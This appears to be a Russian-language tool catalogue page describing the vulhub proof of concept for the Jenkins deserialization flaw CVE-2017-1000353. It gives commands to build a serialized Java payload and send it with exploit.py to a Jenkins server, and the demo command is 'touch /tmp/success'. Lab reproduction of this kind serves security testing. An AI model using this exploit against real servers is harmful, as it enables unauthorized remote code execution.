Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/vulhub/cve-2017-1000353
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеРазработка Полезной Нагрузки
GitHubvulhub/cve-2017-1000353

CVE-2017-1000353

jenkins CVE-2017-1000353 POC

Репозиторий
576221 год назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2017-1000353 POC

Как воспроизвести уязвимость Jenkins CVE-2017-1000353?

Клонируйте этот репозиторий, используйте готовую полезную нагрузку jenkins_poc.ser с помощью следующей команды:

root@kitploit:~
python exploit.py http://your-ip:8080 jenkins_poc.ser

После этого будет выполнена команда touch /tmp/success.

Требования к версии Java

Важно: Генерация полезной нагрузки зависит от версии Java. Она была успешно протестирована с openjdk:8u292. Другие версии Java могут не работать должным образом для генерации и эксплуатации полезной нагрузки.

Как сгенерировать полезную нагрузку jenkins_poc.ser?

Загрузите CVE-2017-1000353-SNAPSHOT-all.jar.

root@kitploit:~
java -jar CVE-2017-1000353-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"
Скачать инструмент

Если вы используете Docker, вы можете использовать следующую команду для обеспечения совместимости:

root@kitploit:~
docker run --rm -v $(pwd):/work -w /work openjdk:8u292 java -jar CVE-2017-1000353-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"

Ссылка

https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2017-1000353